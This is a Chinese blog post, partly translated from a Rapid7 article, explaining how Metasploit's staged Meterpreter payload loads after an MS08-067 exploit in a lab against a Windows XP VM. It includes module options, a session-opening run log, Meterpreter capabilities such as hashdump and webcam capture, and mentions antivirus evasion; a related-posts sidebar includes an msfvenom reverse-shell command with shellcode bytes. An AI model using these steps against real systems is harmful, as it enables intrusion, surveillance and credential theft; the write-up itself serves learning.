meterpreter载荷执行过程及原理

最新推荐文章于 2022-07-02 23:50:27 发布
最新推荐文章于 2022-07-02 23:50:27 发布
阅读量1.5k 收藏 5
点赞数 1
分类专栏: 渗透
原文链接:https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/
版权

原文地址《Deep Dive Into Stageless Meterpreter Payloads

前言

本文通过翻译rapid7的文章,学习理解了meterpreter载荷执行过程及原理,并学习了stage payload的设计理念,这为将来的木马免杀技术学习及通信原理的学习都有很好的帮助,最后在rapid文章翻译基础上,笔者加入了自己的绘图理解,形象的展现了这一过程。

一、什么是stage payload

stage payload是一种分段式的载荷运行方式,它的设计理念是为了满足二进制溢出漏洞利用过程中,由于内存地址中留给攻击者的布局shellcode空间很小的情景。这种情况下,攻击者可以先利用漏洞向靶机发送一个很小的payload,这里命名为stage0,达到建立目标机器与攻击机器建立一个shell通信的目的,然后再通过stage0上传stage1,stage2……等方式,逐步将shell的控制权进行移交,最终得到一个功能强大的shell,这个过程其实和web渗透中的小马拉大马的原理很相似。

二、meterpreter的分段载荷运行过程(ms08-067为例)

实验环境:
攻击机:kali 2020 192.168.253.168
靶机:winxp sp3 192.168.253.141
在这里插入图片描述
我们在攻击机启动msf,选中windows/smb/ms08_067_netapi攻击模块,并设置相应的选项如下。

msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.253.141  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.253.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   34  Windows XP SP3 Chinese - Simplified (NX)

当我们运行run命令,发送payload时,攻击机器首先会启动一个反弹shell的监听,如下图,默认启动端口为4444端口。
在这里插入图片描述
随后,攻击机将一段精心设计好的shellcode发送给靶机,这段shellcode一般为两部分组成:一部分是由一段指令组成,当EIP指向它时,它能够反弹给攻击机一个shell即stage0,这个stage0使攻击机和靶机建立第一个通信,类似于web渗透的小马。另一部分是触发漏洞的特定exploit,它一般是超过正常程序运行通信字节,进而达到覆盖缓冲区EIP指针的目的,使EIP指针指向之前布局好的stage0的起始地址,过程如下图。
在这里插入图片描述
当漏洞触发,靶机执行了stage0,攻击机和靶机建立了一个通信shell,但这个shell并不能完全控制靶机,于是meterpreter会将stage1上传到靶机,这是一个编译好的动态链接库dll文件文件一般以metsrv命名,本例中我们可以在kali2020的中找到该文件,其绝对路径为

/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit-payloads-1.4.1/data/meterpreter/metsrv.x86.dll

靶机发送stage1(即metsrv)的过程如下图
在这里插入图片描述
我们在msf中的执行过程也可以证实上述情况,在第三个[*]中可以看到提示Sending stage (176195 bytes) to 192.168.253.141,这正是stage1。

msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.253.168:4444 
[*] 192.168.253.141:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 192.168.253.141
[*] Meterpreter session 2 opened (192.168.253.168:4444 -> 192.168.253.141:1047) at 2020-05-28 04:12:14 -0400

meterpreter >

我们可以查看metsrv.x86.dll文件大小,发现msf发送字节与该文件字节大小极其相近,由于笔者对此研究没有达到代码级别,因此多出那一段字节是什么在此不做讨论,此处我们只需清楚这个过程meterpreter发送了stage1是metsrv.x86.dll即可。

root@kali2020Local:~# ls -l /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit-payloads-1.4.1/data/meterpreter/metsrv.x86.dll
-rw-r--r-- 1 root root 175104 May 15 03:16 /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit-payloads-1.4.1/data/meterpreter/metsrv.x86.dll

一旦stage1(即metsrv.x86.dll)被加载进入内存,stage0通过简单的EIP指针跳转,将指令控制权转交给stage1,stage1即metsrv的前60个字节是一段shellcode,其一旦执行,将利用反射式DLL注入技术重新映射metsrv并将其加载到内存中,使其达到无需将写入磁盘或向主机进程注册而能够正常工作的目的,这也是meterpreter达到一定免杀效果的原理。然后,它调用DllMain()函数在这个已经加载的ddl文件上,接下来我们熟悉的Meterpreter便接管了控制权。
从这开始,MSF会向靶机推送两个Meterpreter扩展DLL:stdapi和priv。这两个DLL文件也都以与metsrv DLL相同的方式反射加载。此时,Meterpreter已经准备完成,并等待接收攻击者的控制指令。当我们得到一个meterpreter shell的时候,使用help命令,可以看到stdapi和priv两个库文件下包含的命令如下,至此我们也大致了解了两个DLL文件实现的功能。

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes
三、总结

综上过程,我们在获得一个meterpreter会话过程中,实际上有四个stage上传,它们分别是

  • stage0:smb漏洞利用载荷和体积小功能简单的反弹shell小马
  • stage1:metsrv.x86.dll
  • stage2:stdapi.dll
  • stage3:priv.dll

我们可以用以下一张图来描绘其大致流程
在这里插入图片描述

redwand
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
meterpreter工作原理到免杀方式的分析
Hello World.c
03-05 1229
Meterpreter 工作原理 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LP ORT=31012 -f c > test2.c unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89\xe5" "\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4
meterpreter
weixin_33817333的博客
03-12 116
用过metasploit的人应该对meterpreter不陌生,它具有强大的功能,特别是其socks代理,简直就是内网渗透测试神器。由于meterpreter功能强大,萌生了想要把msf做远控的念头。另外,围绕meterpreter一个重要的问题,就是如何绕过杀软。 这促使我决定一窥meterpreter的究竟,以了解其工作原理和流程,从而方便自定义载荷进行免杀,或者予以改造做远控。后来发现,直...
突破meterpreter建立永久访问权限访问其他主机——借刀杀人
渗透测试
05-09 1690
文章目录前言一、使用场景二、实施步骤1.渗透b主机2.建立socks代理服务器3.设置浏览器代理4.设置永久访问权限总结 前言 渗透目标主机,对目标主机搭建跳板建立代理服务器,通过代理主机访问其他主机,不留痕迹 一、使用场景 主机a想访问c无法访问,c只让特定的IP地址访问,例如b,此时就可以先渗透b,在上面搭建跳板建立代理服务器,通过代理服务器访问c 本期例子,a主机使用kali,b主机winxp,c主机linux 二、实施步骤 1.渗透b主机 因为目标位winxp,先使用最常用的MS08_06
第十一期_MSF 后渗透《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 1809
十一、MSF 后渗透 在如此努力地成功利用一个系统之后,我们接下来该怎么办? 我们希望通过在从一个系统到另一个系统的过程中转向和覆盖我们的轨道来进一步访问目标内部网络。渗透测试人员还可以选择嗅探其他潜在受害者的数据包,编辑其注册表以获取更多信息或访问权限,或设置后门以维护更永久的系统访问。 利用这些技术将确保我们保持一定程度的访问权限,并有可能更深入地进入目标受信任的基础设施。 1. 权限提升 经常,尤其是客户端漏洞利用,您会发现您的会话只有有限的用户权限。这可能会严重限制您可以在远程系统上执行的操作,例如
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
载荷板实验原理及实用要点-xxx.pdf
最新发布
11-24
载荷板实验原理及实用要点-xxx.pdf
无人机制作原理过程++.pdf
04-22
【无人机制作原理过程】 无人机,全称无人驾驶航空器,是一种无需飞行员在机内操控的飞行器,广泛应用于气象探测、人工降雨、航空遥感、城市治安巡逻、军事任务等领域。本文以“翔雁”无人机为例,解析无人机的...
高压水载荷下两种原煤样破碎过程及水压临界条件实验研究
06-03
使用自行设计的"高压水载荷下含瓦斯原煤破碎过程模拟实验装置"对煤样的破裂过程进行了研究。结果表明:高压水作用下,硬煤样试件发生脆性变形,经历"起裂-多次压裂-完全破裂"的破坏过程。最终试件被完全压裂。内部裂隙...
道路载荷谱采集及分析处理系统项目介绍01.pdf
02-25
介绍道路载荷谱的测试方法和测试工具。给相关从业入门人员一个指导。行业内较为专业的资料。希望大家能有好评。
矿车轴载荷计算方法的比较及选用
06-29
针对矿车轴的弯曲损坏,分析了固定式矿车车轴的受力,并对力叠加法以及当量负荷法2种计算方法进行了分析和比较,认为应采用当量负荷法进行车轴的设计计算。
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 7997
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3323
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
使用永恒之蓝(MS17-010)漏洞入侵windows7
weixin_34303897的博客
07-02 1186
永恒之蓝简介 前几天,被勒索病毒(Wannacry)刷屏了,这个病毒是大家知道了备份文件的重要性,当然,我是不怕什么病毒的,因为我是一天备份一次文件,而且微云一份,坚果云,移动硬盘一份,就算被黑了又能怎样,最多花个一天时间装个系统,配置一下系统。而且我是不用垃圾windows的,linux百毒不侵,而且我的系统是天天更新。所以说被黑了...
Metasploit 原理 使用
煮酒闲谈
08-13 3634
About Metasploit____________________________________________________________________________________________________________________________________________-Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问
Meterpreter使用总结(1)
CODING...
02-08 2万+
meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:
Metasploit framework(四)——Meterpreter模块简介
Jeromeyoung
03-26 1108
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Meterpreter简介: 它是一种:高级、动态、可扩展的Payload、更加简单、快捷的获取目标...
Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)
weixin_34189116的博客
04-29 3178
第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型 4、攻击Windows服务器 5、利用公用服务 6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏 7、MS17-010 EternalRomance/EternalSynergy/EternalChampion 8、植入后门 9、拒绝服务攻击 简介 在第二...
MeterSphere案例分享丨基于JMeter的性能测试方案演进之路
FIT2CLOUD飞致云的博客
11-25 1712
使用MeterSphere开展性能测试和接口测试。
关于MeterSphere的性能测试架构理解
热门推荐
smooth的博客
09-24 2万+
MeterSphere的定位为一个“一站式的开源持续测试平台”。它主要涵盖测试跟踪、接口测试、性能测试、团队协作等功能,同时兼容JMeter等主流的开源标准,可以有效地助力开发和测试团队充分利用云的弹性,进行高度可扩展的自动化测试。由于自己做性能测试,就比较关联性能测试这块的实现。以下是官方描述的架构: 可以看出来,这个平台是基于Docker的集群部署架构,而且通过NodeController实现了分布式压测部署,性能测试任务会被下发到NodeController,一个NodeController就是
基于机器学习的载荷识别过程
03-31
载荷识别是指根据系统的输入与输出来确定系统的工作状态或负载状态。基于机器学习的载荷识别过程主要包括以下步骤: 1. 数据收集:收集系统的输入与输出数据,包括传感器数据、控制参数、电流、电压等信息。 2. 特征提取:从原始数据中提取有用的特征,如频率、幅值、功率等特征,以便后续分析和建模。 3. 数据预处理:对提取的特征进行预处理,包括去噪、降维、归一化等操作,以便提高模型的准确性和稳定性。 4. 模型选择:根据问题的特点和数据的特征,选择适合的机器学习模型,如支持向量机、决策树、神经网络等。 5. 模型训练:使用训练数据对所选模型进行训练,并根据性能指标对模型进行评估和调优。 6. 模型测试:使用测试数据对训练好的模型进行测试,评估模型的准确性、精度和鲁棒性等指标。 7. 模型部署:将训练好的模型部署到实际应用中,实现实时的载荷识别和监测。 基于机器学习的载荷识别过程需要依赖大量的数据和算法,而且需要专业的技术人员进行研发和实施。但是,一旦建立了有效的模型,就可以实现高效、准确的载荷识别,对提高系统的可靠性和效率具有重要意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值